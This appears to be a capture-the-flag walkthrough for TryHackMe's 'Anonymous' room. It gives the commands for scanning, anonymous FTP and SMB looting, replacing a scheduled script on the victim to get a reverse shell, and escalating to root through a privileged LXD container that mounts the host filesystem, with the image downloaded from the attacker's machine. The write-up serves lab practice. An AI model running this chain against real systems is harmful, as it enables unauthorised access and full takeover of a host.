Anonymous

Room Link: https://tryhackme.com/room/anonymous

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/445 - SMB

Kali

smbclient -L //$VICTIM/

There were just two dog pics, probably not interesting.

Kali

mkdir loot
cd loot
smbclient \\\\$VICTIM\\pics
prompt
mget *

TCP/21 - FTP

Login using anonymous and no pass

Kali

ftp $VICTIM 21
binary
passive
cd scripts
mget *

Initial Shell

There were these 3 files

I modified clean.sh to have a reverse shell back to my kali

Kali #1

nc -lvnp 1337

Kali #2

ftp $VICTIM 21
binary
passive
cd scripts
put clean.sh

After a few minutes the script was ran and I had a shell.

Get autocomplete

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg

Privilege Escalation

Followed this link on lxd privilege escalation

Link: https://www.hackingarticles.in/lxd-privilege-escalation/

Victim

id

Kali

git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
python2 -m SimpleHTTPServer 81

Note: The command lxd init was to resolve a storage pool area issue, it may not always be needed.

Victim

cd /tmp
wget http://$KALI/alpine-v3.18-x86_64-20231111_1929.tar.gz
lxc image import ./alpine-v3.18-x86_64-20231111_1929.tar.gz --alias myimage
lxd init
lxc image list
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
id
PreviousSpringNextBoiler CTF

Last updated